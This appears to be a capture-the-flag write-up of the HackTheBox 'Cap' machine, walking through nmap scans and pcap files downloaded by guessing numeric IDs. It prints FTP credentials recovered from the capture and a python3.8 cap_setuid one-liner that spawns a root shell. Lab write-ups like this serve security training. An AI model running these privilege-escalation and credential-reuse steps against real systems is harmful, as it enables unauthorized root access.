Cap - [HTB]

Cover Image for Cap - [HTB]
Marmeus
Marmeus

Introduction

Cap is an easy linux machine from HackTheBox where we will have to know the natural numbers in order to obtain the user's credentials. Finally, in order to escalate privileges we will need to exploit a setuid capability for a python binary.

Enumeration

As always, let's start finding all opened ports in the machine with nmap.

kali@kali:~/Documents/HTB/CAP$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.245
Nmap scan report for 10.129.92.194
Host is up (0.12s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

# Nmap done at Sat Jun  5 16:25:11 2021 -- 1 IP address (1 host up) scanned in 159.15 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/CAP$ sudo nmap -sC -sV -p21,22,80 -oN PortsDepth.txt 10.129.92.194
Nmap scan report for 10.129.92.194
Host is up (0.12s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|   GetRequest: 
[...]
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Inside the web page there is a meny with several functions where the commands ipconfig and netstat are being executed. Plus, there is another which provides us with a pcap file that we can download.

Nathan's web

Explotation

If we look closely, we can see that the pcap files are identified with numbers (I.e. /data/X).

After some trial and error, it seems that the pcap identifier starts from 0 provide, so we can download a new pcap file, whcih looking inside with wireshark we can obtain FTP login credentials.

Wireshark output
USER nathan
331 Please specify the password.                   
PASS Buck3tH4TF0RM3!
230 Login successful. 

Accesing to the FTP service we can obtain the user flag, but we can also use the same credentials for the SSH service.

Privilege escalation

After executing linpeas we can see in the Capabilities section, python has setuid capabilities, hence we can escalate privileges as root following this post.

[+] Capabilities 
[...]

Files with capabilities:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

For doing so, we need to execute python as follows.

root@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:~# cat /root/root.txt 
[CENSORED]

I hope you liked this easy box and if you need to ask me anything do not hesitate to contact me through my twitter account :P